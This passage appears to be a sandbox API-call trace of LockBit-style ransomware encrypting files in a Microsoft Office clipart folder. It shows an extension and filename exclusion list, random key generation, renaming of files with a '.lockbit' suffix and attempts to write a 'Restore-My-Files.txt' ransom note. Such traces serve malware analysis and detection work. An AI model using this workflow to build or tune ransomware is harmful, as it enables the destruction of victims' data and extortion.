returned -1 [0124.039] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0124.040] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0124.040] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0124.040] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.lockbit") returned 72 [0124.040] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0124.040] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.040] malloc (_Size=0x40068) returned 0x3df0008 [0124.040] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1198) returned 1 [0124.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.042] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.046] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.046] malloc (_Size=0xa6) returned 0x77d7a8 [0124.046] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0124.046] free (_Block=0x77d7a8) [0124.046] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.046] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.046] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.046] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xf00, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099182.WMF", cAlternateFileName="")) returned 1 [0124.046] lstrcmpiW (lpString1=".", lpString2="J0099182.WMF") returned -1 [0124.046] lstrcmpiW (lpString1="..", lpString2="J0099182.WMF") returned -1 [0124.046] PathFindExtensionW (pszPath="J0099182.WMF") returned=".WMF" [0124.046] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0124.046] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0124.046] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0124.046] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0124.047] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0124.047] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099182.WMF") returned 1 [0124.048] lstrcmpiW (lpString1="ntldr", lpString2="J0099182.WMF") returned 1 [0124.048] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099182.WMF") returned 1 [0124.048] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099182.WMF") returned -1 [0124.048] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099182.WMF") returned -1 [0124.048] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099182.WMF") returned 1 [0124.048] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099182.WMF") returned -1 [0124.048] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.048] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF") returned=".WMF" [0124.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0124.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0124.049] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0124.049] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0124.049] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.lockbit") returned 72 [0124.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099182.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0124.050] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.050] malloc (_Size=0x40068) returned 0x3df0008 [0124.050] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3840) returned 1 [0124.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.051] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.093] malloc (_Size=0xa6) returned 0x77d7a8 [0124.093] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.094] free (_Block=0x77d7a8) [0124.094] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099182.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.094] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.094] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x1352, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099183.WMF", cAlternateFileName="")) returned 1 [0124.094] lstrcmpiW (lpString1=".", lpString2="J0099183.WMF") returned -1 [0124.094] lstrcmpiW (lpString1="..", lpString2="J0099183.WMF") returned -1 [0124.094] PathFindExtensionW (pszPath="J0099183.WMF") returned=".WMF" [0124.094] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0124.094] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0124.095] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0124.096] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0124.096] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099183.WMF") returned 1 [0124.096] lstrcmpiW (lpString1="ntldr", lpString2="J0099183.WMF") returned 1 [0124.096] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099183.WMF") returned 1 [0124.096] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099183.WMF") returned -1 [0124.096] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099183.WMF") returned -1 [0124.097] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099183.WMF") returned 1 [0124.097] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099183.WMF") returned -1 [0124.097] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.097] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned=".WMF" [0124.097] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0124.097] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0124.097] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0124.098] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0124.098] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0124.098] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0124.098] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0124.098] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0124.098] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0124.098] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0124.098] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.lockbit") returned 72 [0124.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0124.102] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.102] malloc (_Size=0x40068) returned 0x1ff1e60 [0124.102] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4946) returned 1 [0124.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0124.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0124.104] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.125] malloc (_Size=0xa6) returned 0x77d7a8 [0124.125] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.140] free (_Block=0x77d7a8) [0124.140] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.140] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.140] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.140] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x1016, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099184.WMF", cAlternateFileName="")) returned 1 [0124.143] lstrcmpiW (lpString1=".", lpString2="J0099184.WMF") returned -1 [0124.144] lstrcmpiW (lpString1="..", lpString2="J0099184.WMF") returned -1 [0124.144] PathFindExtensionW (pszPath="J0099184.WMF") returned=".WMF" [0124.144] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0124.144] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0124.145] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0124.145] lstrcmpiW (lpString1=".bat", 